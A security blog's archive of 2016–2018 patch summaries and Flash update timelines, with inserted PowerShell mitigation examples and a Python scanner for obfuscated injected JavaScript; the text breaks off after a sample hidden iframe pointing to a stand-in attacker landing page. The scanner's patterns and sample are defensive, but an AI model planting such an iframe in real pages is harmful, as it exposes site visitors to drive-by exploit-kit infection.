Tag Archives: Exploit Kit

May 2018 Update Summary

====================
Update: 5th June 2018:
====================
As discussed in the post below, the zero day vulnerability (defined) designated as CVE-2018-8174 (defined) patched by Microsoft last month has since been incorporated into the RIG exploit kit (defined). The attackers have used the extra detail provided from anti-malware vendors, GitHub (the popular source code repository) and MetaSploit (defined) to create this exploit.

As detailed below, the vulnerability is considered medium severity; however, it also requires action from the user before it can take any malicious action, usually opening a malicious file or visiting a malicious website.

Please use caution for any email that you receive with an attachment you weren’t expecting. Thank you.

====================
Update: 31st May 2018:
====================
A vulnerability in JScript (Microsoft’s implementation of JavaScript (defined)) has been responsibly disclosed (defined) by Dmitri Kaslov of Telspace Systems, who passed it along to Trend Micro’s Zero-Day Initiative (ZDI). At this time, this vulnerability is un-patched and is thus a zero day vulnerability (defined).

The vulnerability allows a remote attacker to execute malicious instructions of their choice on the victim’s system, but only in the context of a sandboxed (defined) environment. In other words, the code cannot by itself be used to fully compromise a system. It must be chained with another vulnerability to have the potential of fully compromising a system, making the vulnerability less serious.

At this time, components within Windows such as wscript.exe and Internet Explorer should not be permitted to run untrusted JScript code. The mitigation described under the heading near the end of the page named “How To Tell Explorer To Open .JS Files With Notepad” may be of assistance with implementing this recommendation.
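One way to implement the file-association part of that mitigation, as an added PowerShell example that is not part of the original post: it re-points the JSFile and JSEFile ProgIDs (the registered handlers behind .js and .jse) at Notepad for the current user, so a double-clicked script is displayed rather than run by wscript.exe. The ProgID names, the registry paths and the Notepad location are assumptions based on the standard Windows Script Host registration.

```powershell
# Added example, not from the blog post. Redirect the Windows Script Host
# file types for .js and .jse to Notepad for the current user only.
# Assumptions: JSFile/JSEFile are the ProgIDs registered for .js/.jse, and
# HKCU\Software\Classes takes precedence over HKLM\Software\Classes when the
# shell resolves a ProgID (so no administrator rights are needed).
$progIds = 'JSFile', 'JSEFile'
$notepad = Join-Path $env:windir 'system32\notepad.exe'

function Set-ScriptTypeToNotepad {
    param([string]$ProgId, [string]$NotepadPath)
    $cmdKey = "HKCU:\Software\Classes\$ProgId\Shell\Open\Command"
    New-Item -Path $cmdKey -Force | Out-Null
    # "%1" is replaced by the shell with the double-clicked file's path.
    Set-ItemProperty -Path $cmdKey -Name '(default)' -Value "`"$NotepadPath`" `"%1`""
}

function Test-ScriptTypeToNotepad {
    param([string]$ProgId)
    $cmdKey = "HKCU:\Software\Classes\$ProgId\Shell\Open\Command"
    if (-not (Test-Path $cmdKey)) { return $false }
    $value = (Get-ItemProperty -Path $cmdKey).'(default)'
    return ($value -like '*notepad.exe*')
}

foreach ($id in $progIds) {
    Set-ScriptTypeToNotepad -ProgId $id -NotepadPath $notepad
    if (Test-ScriptTypeToNotepad -ProgId $id) {
        Write-Output "$id now opens in Notepad for this user."
    } else {
        Write-Warning "$id was not redirected; check the registry key manually."
    }
}
```

This only changes what a double-click (or an opened email attachment) does; a script launched explicitly through wscript.exe or cscript.exe still runs, and the change does not affect Internet Explorer’s script engine. If a per-user override is later unwanted, deleting the HKCU\Software\Classes\JSFile and JSEFile keys restores the machine-wide default.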

I will update this post when this vulnerability is patched by Microsoft or when further information becomes available.

Thank you.

====================
Update: 18th May 2018:
====================
Other updates made available by Microsoft for the Spectre Variant 2 vulnerability are:

kb4100347

This update was not offered to my Windows laptop running Version 1803. As you know it contains an Intel Core i7 6500U CPU. I downloaded the version 1803 update from the Microsoft Catalog and it installed successfully. My system is showing the full green result when the PowerShell command Get-SpeculationControlSettings is run. It results in the final screenshot shown with this article. Further tips on running this useful command are provided in this Microsoft support article; please see the headings “PowerShell Verification using the PowerShell Gallery (Windows Server 2016 or WMF 5.0/5.1)” or “PowerShell Verification using a download from Technet (earlier operating system versions and earlier WMF versions)” depending on your version of Windows.
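For readers who would rather interpret that command’s result than read the coloured output by eye, the following is an added PowerShell example (not from the post or from Microsoft’s article). It installs the SpeculationControl module from the PowerShell Gallery and reports which of the three preconditions for the Spectre Variant 2 (branch target injection) mitigation is missing. The property names used are assumed to match the module’s output object; if your module version differs, compare them against `Get-SpeculationControlSettings | Get-Member`.

```powershell
# Added example, not from the blog post. Run from an elevated PowerShell
# prompt with internet access (Install-Module downloads the module).
# Assumption: the BTI* properties below are present on the object returned
# by Get-SpeculationControlSettings.
Set-ExecutionPolicy RemoteSigned -Scope CurrentUser -Force
Install-Module -Name SpeculationControl -Scope CurrentUser -Force
Import-Module SpeculationControl

function Get-SpectreV2Status {
    param($Settings)
    # All three must hold for the "full green" Variant 2 result:
    #  1. the CPU microcode/firmware exposes the branch control features,
    #  2. the Windows update that uses them is installed,
    #  3. that support is enabled rather than switched off by policy.
    if (-not $Settings.BTIHardwarePresent) {
        return 'Firmware/microcode support missing: apply the OEM BIOS update or the Microsoft microcode update for your Windows version (e.g. kb4100347 for 1803).'
    }
    if (-not $Settings.BTIWindowsSupportPresent) {
        return 'Windows support missing: install the latest cumulative update for your Windows version.'
    }
    if (-not $Settings.BTIWindowsSupportEnabled) {
        return 'Windows support present but disabled: check for a disabling registry override or policy.'
    }
    return 'Spectre Variant 2 mitigation: hardware and OS support present and enabled.'
}

$settings = Get-SpeculationControlSettings
Get-SpectreV2Status -Settings $settings
```

The first two branches map directly onto the situation described above: a system with the Windows update installed but no firmware or microcode update shows hardware support absent, and the fix is the microcode package rather than another cumulative update.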

Microsoft have also issued an update for Windows version 1709 to resolve a vulnerability that was itself introduced by their previous patch. This resolution was provided in update kb4103727. Further details are available in Alex Ionescu’s tweet (a security architect with CrowdStrike and Windows Internals expert). Previous Spectre V2 patches were kb4091666 and kb4078407.

This issue was already addressed in version 1803 of Windows.

If any of the above updates apply to your version of Windows, please install them. If the updates are already present or are not required, the installation will not proceed when you manually attempt it.

Thank you.

====================
Update: 17th May 2018:
====================
Adobe have since issued further updates to resolve critical vulnerabilities within Adobe Acrobat DC, Adobe Reader DC and Photoshop. Further details of the zero day (defined) vulnerabilities addressed in Adobe Acrobat/Reader are available here and here.

Adobe Acrobat and Reader (priority 1, 47 CVEs)

Adobe Photoshop CC 2018 and 2017 (priority 3, 1 CVE).

Further updates are listed at the end of this post. Thank you.

====================
Update: 10th May 2018:
====================
Further details have emerged of another zero day (defined) vulnerability affecting Windows Server 2008 R2 and Windows 7.

CVE-2018-8120 is an elevation of privilege (defined) vulnerability, but it can only be exploited if the attacker has already compromised a user account on the system, allowing the attacker to log in when they choose. Upon logging in, the attacker could obtain kernel level access/permissions (defined) by elevating their privileges and then carry out any action they choose.

The prioritised list below has been updated to reflect this. Thank you.
====================

====================
Original Post:
====================

====================
Apologies for only posting an update summary last month. Other commitments meant I didn’t have the bandwidth to contribute more. I’ll try to make more time this month. Thanks.
====================

Earlier today Microsoft released their scheduled monthly security updates resolving 67 vulnerabilities. Notably Windows 10 Version 1803 receives its first update this month. Windows Server 2016 Version 1803 remains in testing in advance of its upcoming release. As always, Microsoft have provided further details within their Security Updates Guide.

There are 4 knowledge base articles detailing potential issues (all of which are pending resolutions) you may experience upon installing these updates. They are listed below for your reference:

4103712

4103718

4103723

4103727

====================

Separately, Adobe released updates for 3 of their products, namely:

Adobe Creative Cloud Desktop Application (priority 2 (overall), 3x CVEs)

Adobe Connect (priority 2, 1x CVE)

Adobe Flash Player (priority 2, 1x CVE)

Non-Microsoft browsers should update automatically, e.g. Google Chrome should release a browser update in the coming days or will use its component update feature (the update was not available at the time of writing). Like last month, Microsoft issued a security advisory containing details of their updates.

As always, you can monitor the availability of security updates for most of your software from the following websites (among others) or use one of the utilities presented on this page (since Secunia PSI was phased out on the 20th of April):
—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates. News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.

====================
For this month’s Microsoft updates, I will prioritize the order of installation below. A useful list of all CVEs for this month is present here:
====================

Windows VBScript Engine Remote Code Execution Vulnerability (a zero day (defined) vulnerability)

Win32k Elevation of Privilege Vulnerability

Microsoft Edge and Internet Explorer (similar to last month, multiple versions of Edge and IE are affected, with many of the CVEs affecting the Microsoft Scripting Engine)

Microsoft Hyper-V (Update 1 and Update 2)

Microsoft Office (detailed list available here)
====================
Please install the remaining updates at your earliest convenience.

One of the vulnerabilities addressed by Microsoft this month, namely CVE-2018-8897: Windows Kernel Elevation of Privilege Vulnerability, arose due to the misinterpretation of documentation from Intel regarding how a CPU (defined) raises a debug (defined) exception to transfer control to debugging software (usually used by a software developer). The specific instructions were the assembly language instructions (defined) MOV to SS and POP to SS.

As usual, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues. I have provided further details of updates available for other commonly used applications below.

Thank you.

=======================
Malwarebytes Anti-Malware
=======================
Last week Malwarebytes updated their anti-malware product to version 3.5.1. The full list of improvements is available here, but the update also brought the bundled copy of 7-Zip to version 18.05. I verified this manually since the above release notes did not make reference to it. Further details of the 7-Zip update are available in my April blog post.

Moreover, Directory Opus updated their product to version 12.8.1 Beta, adding new DLLs (defined) for 7-Zip and UnRAR, once again to address the vulnerabilities found within the UnRAR DLL that is also used by 7-Zip.

=======================
Mozilla Firefox:
=======================
This month Mozilla made available security updates for Firefox and Firefox ESR (Extended Support Release):

9th May: Firefox 60.0: Resolves 2x critical CVEs, 6x high, 14x moderate CVEs and 4x low severity CVEs

9th May: Firefox ESR 52.8: Resolves 2x critical, 5x high, 3x moderate CVEs

Further details of the security issues resolved by these updates are available in the links above. Details of how to install updates for Firefox are here. If Firefox is your web browser of choice, if you have not already done so, please update it as soon as possible to resolve these security issues.

=======================
Google Chrome:
=======================
Google released Google Chrome version 66.0.3359.170 to address 4 vulnerabilities and to include a newer version of Adobe Flash Player.

One of the four vulnerabilities addressed relates to how Chrome handles browser extensions, resolving a privilege escalation issue (defined). Further details are available here.

=======================
Wireshark 2.4.7 and 2.6.1
=======================
v2.4.7: 6 security advisories

v2.6.1: 9 security advisories

As per standard process, Linux distributions can obtain this update using the operating system’s standard package manager (if the latest version is not installed automatically using the package manager, you can instead compile the source code (v2.6.1 or v2.4.7)). This forum thread and this forum thread may also be helpful to you with installing Wireshark on your Linux based system.

For Mac OS X and Windows, the update is available within the downloads section of the Wireshark website. In addition, a detailed FAQ for Wireshark is available here.

=======================
USB Denial of Service (DoS) Will not Receive a Fix
=======================
In other vulnerability related news, a denial of service issue (defined) privately/responsibly disclosed (defined) by security researcher Marius Tivadar will not be fixed by Microsoft with a security update, since the vulnerability requires physical access to the target system or social engineering (defined) and does not result in an attacker being able to execute code of their choice on the affected system.

In my opinion, this is justified since if an attacker can obtain physical access to your system it significantly enhances the damage they can do. This statement also forms part of Microsoft’s 10 Immutable Laws of Security.

====================
Update: 31st May 2018
====================

=======================
VideoLAN VLC:
=======================
Yesterday VideoLAN made available VLC version 3.0.3 for Linux, Windows, macOS, BSD, Android, iOS, UWP and Windows Phone. Its release notes detail one potential security issue (a buffer overread (defined)) and 3rd party libraries being updated to address security issues. No specific numbers were provided. A large number of non-security issues were also resolved.

Please update to version 3.0.3 to benefit from these improvements.

=======================
Google Chrome:
=======================
Earlier this month Google made available version 67, resolving 34 security issues. The improvements that are part of this new version are discussed in this Bleeping Computer article.

Moreover this version includes an early implementation of a new user interface for the tabs, address bar, settings button (sometimes referred to as the “chrome” (no pun intended) of an application). This article provides more details and includes steps to enable the new UI. I have done so and it’s a subtle difference but I already really like it. The Incognito mode is even more noticeable. The UI also seems more responsive (but that may be placebo effect).

Google Chrome updates automatically and will apply the update the next time Chrome is closed and then re-opened. Chrome can also be updated immediately by clicking the Options button (it looks like 3 stacked small horizontal lines, sometimes called a “hamburger” button) in the upper right corner of the window and choosing “About Google Chrome” from the menu. Follow the prompt to Re-launch Chrome for the updates to take effect.
=======================

=======================
Apple Security Updates:
=======================
In late May Apple made available the following updates. Interestingly, while the updates were available, no specific details of the improvements they include (security or otherwise) were yet available.

Since then, further details of the updates made available by Apple have been emerging. Sophos have theorized that Apple have made improvements to the iOS Messages app, making it more stable and less susceptible to crashing. They are thus recommending that you install the iOS 11.4 update as soon as possible.

They also discuss the addition of a new security feature which blocks access to a mobile device if the passcode has not been entered within the last seven days. This change is expected to become part of 11.4.1 and a stricter form for iOS 12. After this time the Apple Lightning cable will only charge the device and not allow data access. This appears to be part of Apple’s response to law enforcement and forensics firms accessing Apple devices attempting to collect evidence of the device’s owner’s wrongdoings.

Further details have since emerged for these Apple security updates:

Apple iOS v11.4 (resolves 35x CVEs (defined))

Apple tvOS 11.4 (resolves 24x CVEs)

Apple watchOS 4.3.1 (resolves 20x CVEs)

Apple iTunes version 12.7.5 for Windows (resolves 16x CVEs)

Moreover, BleepingComputer have noted that two of the vulnerabilities patched were buffer overflows (defined), both present in the kernels (defined) of iOS, macOS, tvOS and watchOS.

=======================

Please see these links from Apple for advice on backing up your iPhone and iPad. Advice for updating tvOS is available here while the steps for updating the Apple Watch are available here.

As always, further details of these updates are available on Apple’s dedicated security updates page.

For advice on how to install updates for Apple devices, please see the steps detailed at the end of this Sophos blog post as well as this link (from my “Protecting Your PC” page).

=======================
Hitman Pro:
=======================
As recommended on my Tools and Resources page, Hitman Pro (now part of Sophos Security) has been updated to version 3.8.20 (Build 294). This update resolves a vulnerability relating to DLL hijacking (defined) (apologies; for this link you may need to dismiss several adverts before the requested page loads). Any previous version of the tool should update automatically to the most recent version when opened.

Adobe Flash Player 2018 Update Tracker

Just like the 2015, 2016 and 2017 trackers that are incredibly popular on this blog, I am providing the same information below for the year 2018.

I have created a new post to make the timeline easier to follow. As before it will be updated throughout the year with any details of the Flash vulnerabilities being exploited.

Thank you.

=======================

=======================
9th January: Adobe releases Flash Player v28.0.0.137 resolving 1x priority 2 CVE (defined).

6th February: Adobe releases Flash Player v28.0.0.161 resolving 2x priority 1 CVEs. Please see the timeline update for the 13th of April (below) for more information on how one of these vulnerabilities is now being exploited.

13th March: Adobe releases Flash Player v29.0.0.113 resolving 2x priority 2 CVEs.

10th April: Adobe releases Flash Player v29.0.0.140 resolving 6x priority 2 CVEs.

8th May 2018: Adobe releases Flash Player v29.0.0.171 resolving 1x priority 2 CVE.

7th June 2018: Adobe releases Flash Player v30.0.0.113 resolving 4x CVEs with an overall priority of 1.

10th July 2018: Adobe releases Flash Player v30.0.0.134 resolving 2x CVEs with an overall priority of 2.

14th August 2018: Adobe releases Flash Player v30.0.0.154 addressing 5x CVEs with an overall priority of 2.

11th September 2018: Adobe releases Flash Player v31.0.0.108 addressing 1x CVE with an overall priority of 2.

14th November 2018: Adobe releases Flash Player v31.0.0.148 addressing 1x priority 2 CVE.
=======================

Update: 10th January 2018: The timeline was updated to add the Adobe Flash Player update for January 2018. At the time of writing no exploits for the issue fixed by this update are known to be taking place.

Update: 13th February 2018: The timeline was updated to add the Adobe Flash Player update for February. One of these vulnerabilities, CVE-2018-4878, is a zero day (defined) vulnerability being exploited in targeted attacks.

Update: 13th March 2018: The timeline was updated to add the Adobe Flash Player update for March. At the time of writing neither of the 2 vulnerabilities fixed are being exploited.

Update 1st April 2018: No further vulnerabilities within Flash Player were disclosed during the Pwn2Own 2018 competition.

Update 13th April 2018: The timeline was updated to add the Adobe Flash Player update for April. At the time of writing none of the 6 vulnerabilities fixed are being exploited.

Update 8th May 2018: The timeline was updated to add the Adobe Flash Player update for May. Similar to April; at the time of writing the resolved vulnerability is not being exploited.

CVE-2018-4878, the use after free (defined) vulnerability resolved by Adobe in February, is now being used by the ThreadKit exploit kit (defined) to send Microsoft Office documents exploiting this flaw. Please update Adobe Flash Player if you have it installed and do not open any document attached to an email you weren’t expecting. Further details are available in this news article.

Update: 12th June 2018: The timeline was updated to add the Adobe Flash Player update for June. This was released ahead of schedule on the 7th of June. This update resolved a zero day vulnerability (defined) CVE-2018-5002 which required little to no user interaction to trigger. Further details are available in my separate blog post.

Update: 27th July 2018: A US Senator has asked 3 government agencies to cease using Adobe Flash by August 2019, ahead of the end-of-2020 deadline set by Adobe. The timeline was also updated to include the Adobe Flash Player update for July.

Update 23rd August 2018: The timeline was updated to add the Adobe Flash Player update for August. At the time of writing none of the 5 addressed vulnerabilities are being exploited.

Update 9th October 2018: The timeline was updated to add the Adobe Flash Player update for September (sorry for the delay). At the time of writing the addressed vulnerability is not being exploited. No updates for October 2018 have been issued.

Update 14th November 2018: The timeline was updated to add the Adobe Flash Player update for November. At the time of writing the addressed vulnerability is not being exploited. No updates for October 2018 were issued.

=======================

February 2017 Security Updates Summary

=======================
Update: 28th February 2017
====================
Apologies for not updating this post sooner.

On the 21st of February Microsoft made available their re-packaged update of Adobe Flash Player kb4010250 for Windows 8.1 and Windows 10 systems.

The Adobe Flash Player within Google Chrome should have automatically updated earlier this month. If this link shows that the installed version is older than v24.0.0.221, you can use the steps within this article to quickly update Google Chrome’s Flash Player to the latest version using its component updater.

An alternative which I have not tried is to use this download from Softpedia to take the place of the Microsoft update (mentioned above) but this shouldn’t be necessary since month long postponements of security updates should be extremely rare.

It’s very likely next month’s Update Tuesday will be busy. There were very few updates in January and no Microsoft updates in February. On the 23rd of February Google’s Project Zero team publicly disclosed a second unpatched security vulnerability in Microsoft Internet Explorer and Edge. They also recently disclosed a vulnerability in Windows GDI. Combine this with an existing zero day (defined) Windows Server Message Block (SMB) vulnerability, a Firefox update expected on the 6th of March and Pwn2Own on the 15th to 17th of March; this will be a busy month!

As always, I will be here to guide you through it. Thank you.

====================
Original Post:
====================
As I am sure you are aware, the release of Microsoft’s security updates was delayed as per their blog post. I will detail Adobe’s scheduled updates below and update this post when Microsoft’s are available.

====================
Adobe made 3 security bulletins available for Adobe Flash, Adobe Digital Editions and Adobe Campaign. The Flash Player bulletin resolves 12x priority 1 vulnerabilities. The Digital Editions and Campaign updates address 9 and 2 vulnerabilities respectively (both sets are priority 3). Adobe’s priority ratings are explained in this link.

Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin (link to be added when available) as appropriate and apply the recommended updates. Google Chrome users will have the update installed automatically alongside the updated version of Google Chrome, which will most likely be made available by Google either later today or in the next 1 to 2 days.

If you use any of the above Adobe products, please review the security bulletins linked to above and apply the necessary updates. The Flash update should be installed as soon as possible since exploit kits (defined) tend to take advantage of newly disclosed vulnerabilities very quickly.

You can monitor the availability of security updates for most of your software from the following websites (among others) or use Secunia PSI:
—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.
—————
If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

While there may only be 3 Microsoft bulletins this month, I will prioritise the order of updates for you below:

Another security precaution that you may wish to take if you have Microsoft EMET installed (please ensure your version of EMET is the most recent version, 5.51) is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations of how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As always, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

January 2017 Security Updates Summary

Earlier today Microsoft and Adobe released their scheduled monthly security updates.

Microsoft only made 4 bulletins available. These updates address 3 vulnerabilities listed within Microsoft’s security bulletin summary (as before excluding the Adobe bulletin). These are more formally known as CVEs (defined).

Once again, there are no Known Issues listed within the above summary page. At the time of writing the IT Pro Patch Tuesday blog does not list any Known Issues. However, please check it before deploying your security updates just to be sure. As always, if any issues do arise, those pages should be your first places to check for solutions.

Next month Microsoft will only be publishing its security bulletins and release notes within their Security Updates Guide, rather than distributing this information across several pages. This post from WinSuperSite explains the changes in full.

====================
Adobe made a pair of security bulletins available for Adobe Flash and Adobe Acrobat/Adobe Reader. The Flash Player bulletin resolves 13x priority 1 vulnerabilities. The Adobe Acrobat/Adobe Reader bulletin resolves 29x priority 2 vulnerabilities. Adobe’s priority ratings are explained in the previous link.

Depending on which version of Flash Player you have, please review the Adobe security bulletin or Microsoft bulletin as appropriate and apply the recommended updates. Google Chrome users will have the update installed automatically alongside the updated version of Google Chrome, which will most likely be made available by Google either later today or in the next 1 to 2 days.

If you use Flash or Adobe Acrobat/Adobe Reader, please review the security bulletins linked to above and apply the necessary updates. The Flash update should be installed as soon as possible since exploit kits (defined) tend to take advantage of newly disclosed vulnerabilities very quickly.

You can monitor the availability of security updates for most of your software from the following websites (among others) or use Secunia PSI:

—————
US Computer Emergency Readiness Team (CERT) (please see the “Information on Security Updates” heading of the “Protecting Your PC” page):

https://www.us-cert.gov/

A further useful source of update related information is the Calendar of Updates.

News/announcements of updates in the categories of General Software, Security Software and Utilities are available on their website. The news/announcements are very timely and (almost always) contain useful direct download links as well as the changes/improvements made by those updates (where possible).

If you like and use it, please also consider supporting that entirely volunteer run website by donating.
—————

If you use any of the above software, please install the appropriate updates as soon as possible. Steps for installing updates for Windows are provided on the “Protecting Your PC” page.

While there may only be 3 Microsoft bulletins this month, I will prioritise the order of updates for you below:

The update for Microsoft Office should be installed first due to its criticality. This should be followed by the update for Microsoft Edge and finally by the LSASS update. The update for Edge is important because exploit kits rely on such patches not being installed in order to spread further malware (defined).

As always, detailed information on the contents of each security bulletin is published each month within ComputerWorld’s Patch Tuesday Debugged column.

Another security precaution that you may wish to take if you have Microsoft EMET installed (please ensure your version of EMET is the most recent version, 5.51) is to use it to protect you from Adobe Flash being used to exploit vulnerabilities when you open a Microsoft Office document or Adobe PDF file. I provide recommendations of how to do this at the end of the July 2015 Update Summary.

Please note that Microsoft EMET is in the process of being retired with the end of support scheduled for the 31st of July 2018.

As is my standard practice, I would recommend backing up the data on any device for which you are installing updates to prevent data loss in the rare event that any update causes unexpected issues.

Thank you.

Adobe Flash Player 2017 Update Tracker

In a similar manner to the 2015 and 2016 trackers that were incredibly popular on this blog, I am providing the same information below for the year 2017.

I have created a new post to make the timeline easier to follow. It will be updated throughout the year with any details of the Flash vulnerabilities being exploited.

Thank you.

=======================
10th January: Adobe releases Flash Player v24.0.0.194 resolving 13 CVEs.

14th February: Adobe releases Flash Player v24.0.0.221 again resolving 12 CVEs.

14th March: Adobe releases Flash Player v25.0.0.127 resolving 8 CVEs.

11th April: Adobe releases v25.0.0.148 resolving 7 CVEs (including some from Pwn2Own 2017).

9th May: Adobe releases Flash Player v25.0.0.171 resolving 7 CVEs.

13th June: Adobe releases Flash Player v26.0.0.126 resolving 9 CVEs.

11th July: Adobe releases Flash Player v26.0.0.137 resolving 3 CVEs. It’s refreshing to see such a small number of CVEs being patched. However it will be interesting to see if this trend continues next month.

8th August: Adobe releases Flash Player v26.0.0.151 resolving 2 CVEs. Similar to last month the number of vulnerabilities is low. It’s not yet clear if this is due to Adobe’s recent announcement to de-commission Flash Player in 2020.

12th September 2017: Adobe have released Flash Player v27.0.0.130 to resolve 2 critical CVEs. Similar to recent months the number of vulnerabilities being addressed remains low.

16th October 2017: Adobe released Flash Player v27.0.0.170 to resolve 1 critical CVE being exploited by the BlackOasis APT group.

14th November 2017: Adobe releases Flash Player v27.0.0.187 to resolve 5 critical CVEs. No known exploits for these issues were observed at the time of release or following the release.

12th December 2017: Adobe releases Flash Player v28.0.0.126 to fix 1 moderate CVE. As for November, no known exploits were used to target this vulnerability.

=======================

Update: 10th January 2017: The timeline was updated to add the Adobe Flash Player update for January 2017. At the time of writing no exploits for the issues fixed by this update are known to be taking place.

Update: 14th February 2017: The timeline was updated to add the Adobe Flash Player update for February 2017. At this time no exploits for the issues fixed by this update are known to be taking place.

Update: 14th March 2017: The timeline was updated to add the Adobe Flash Player update for March 2017. At this time no exploits for the issues fixed by this update are known to be taking place. With Pwn2Own 2017 due to take place this month, expect more updates soon.

Update: 11th April 2017: The timeline was updated to add the Adobe Flash Player update for April 2017. As before, at the time of writing no exploits for the issues fixed by this update are known to be taking place.

Update: 8th May 2017: I have corrected the number of vulnerabilities addressed in the February and March updates mentioned above. While the numbers I originally listed were correct at the time of writing, Adobe subsequently revised them. The end of the February and March bulletins highlight the revisions made by Adobe. I will endeavor to update these entries sooner in future.

Update: 9th May 2017: The timeline was updated to add the Adobe Flash Player update for May 2017. At this time, no exploits for the issues fixed by this update are known to be taking place.

Update: 14th June 2017: The timeline was updated to add the Adobe Flash Player update for June 2017. At the time of writing, no exploits for the issues fixed by this update are known to be taking place.

Update: 11th July 2017: The timeline was updated to add the Adobe Flash Player update for July 2017. Just like for June 2017, no exploits for the issues fixed by this update are known to be taking place.

Update: 8th August 2017: The timeline was updated to add the Adobe Flash Player update for August 2017. As before, no exploits for the issues fixed by this update are known to be taking place.

Update: 12th September 2017: The timeline was updated to include the Adobe Flash Player updates for September 2017. Similar to last month, no exploits for the issues fixed by this update are known to be taking place at this time.

Update: 18th October 2017: The timeline was updated to include the Adobe Flash Player updates for October 2017. It addresses a zero day vulnerability known to be under active exploitation.

Update: 26th December 2017: The timeline was updated to include the Adobe Flash Player updates for November and December 2017. Sorry for the delay in updating this.

WordPress Releases Security Update (February 2016)

On the 3rd of February, WordPress released a security update to their popular self-hosted blogging tool/content management system (CMS, defined), bringing it to version 4.4.2.

This is a critical security update that resolves 2 security issues. The first is a server-side request forgery (SSRF) vulnerability that could allow information disclosure, since it has the potential to bypass normal access controls. The second is an open redirect on the WordPress login page, which could have been used to send a user who is trying to log in to another site.

Due to the severity of these issues, WordPress is advising its users to update immediately.

Separately, a ransomware (defined) campaign is compromising very large numbers of WordPress websites by adding obfuscated (defined within this post) JavaScript (defined) to those websites. The injected JavaScript redirects visitors to a website of the attacker’s choice hosting the Nuclear exploit kit (defined), which delivers the ransomware to the visitor’s system if it is running an outdated version of Adobe Flash Player/Reader, Microsoft Internet Explorer or Silverlight. At the time of writing there is very little detection of the exploit code on VirusTotal.com.

A shortlist of recommendations to protect your WordPress website against this ransomware campaign is shown below (for your convenience). This list, along with further details of this threat, is available from Heimdal Security’s blog post (I wish to express my sincere thanks to them for making such detailed information available to protect against this threat):

  • Keep software and your operating system updated at all times
  • Backup your data, do it often and in multiple locations
  • Use a security tool that can filter your web traffic and protect you against ransomware, which traditional antivirus cannot detect or block.

Moreover, a technical description of how this attack occurs against a WordPress website is available within this Sucuri blog post. Malwarebytes also provide advice and a further technical description in their blog post, in which they describe how the campaign has switched from the Nuclear exploit kit (defined) to the Angler exploit kit.

As always, WordPress users can update their CMS manually (access your WordPress dashboard and choose Updates -> Update Now). Since version 3.7, WordPress includes an automatic updater (thanks to Sophos for this useful piece of information) that will install security updates such as this one in the background. WordPress.com hosted blogs such as the one you are reading now automatically receive such security updates.
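The following is an added example of my own (not code from Heimdal, Sucuri or Malwarebytes) of a quick triage for the kind of injection described above: it pulls every inline `<script>` block out of a theme or plugin file and scores it on indicators that hand-written theme code rarely shows together, such as `document.write(unescape(...))` or `eval(String.fromCharCode(...))` combined with long runs of percent or hex escapes. The indicator list and thresholds are my assumptions, and the sample page at the bottom is constructed for the example.

```python
import math
import os
import re
import sys

# Indicators of injected, obfuscated JavaScript. The list and thresholds are my
# own assumptions, not taken from the Heimdal, Sucuri or Malwarebytes write-ups.
SUSPICIOUS_CALLS = {
    "eval": re.compile(r"\beval\s*\("),
    "unescape": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document.write": re.compile(r"document\.write\s*\("),
    "atob": re.compile(r"\batob\s*\("),
    "Function": re.compile(r"\bFunction\s*\("),
}
ESCAPE_SEQ = re.compile(r"\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")
SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def shannon_entropy(text):
    """Bits per character; packed or encoded payloads score higher than hand-written code."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def obfuscation_indicators(js):
    """Return the names of the indicators that fire for one script body."""
    hits = [name for name, pat in SUSPICIOUS_CALLS.items() if pat.search(js)]
    escapes = len(ESCAPE_SEQ.findall(js))
    if escapes >= 20:
        hits.append("escapes=%d" % escapes)
    longest = max((len(line) for line in js.splitlines()), default=0)
    if longest >= 500:
        hits.append("longest_line=%d" % longest)
    entropy = shannon_entropy(js)
    if entropy >= 5.0:
        hits.append("entropy=%.2f" % entropy)
    return hits


def scan_html(text, threshold=2):
    """Score every inline <script> block; return (block index, indicators) at or over threshold."""
    flagged = []
    for idx, match in enumerate(SCRIPT_BLOCK.finditer(text)):
        hits = obfuscation_indicators(match.group(1))
        if len(hits) >= threshold:
            flagged.append((idx, hits))
    return flagged


def scan_tree(root, threshold=2):
    """Walk a directory such as wp-content and return {path: flagged blocks} for files with hits."""
    results = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith((".php", ".html", ".htm")):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    found = scan_html(fh.read(), threshold)
            elif name.endswith(".js"):
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    hits = obfuscation_indicators(fh.read())
                found = [(0, hits)] if len(hits) >= threshold else []
            else:
                continue
            if found:
                results[path] = found
    return results


# Constructed sample page: a benign theme script followed by an injected
# document.write(unescape(...)) dropper of the kind described in the post.
_PAYLOAD = '<iframe src="http://attacker.invalid/landing.php" width=0 height=0></iframe>'
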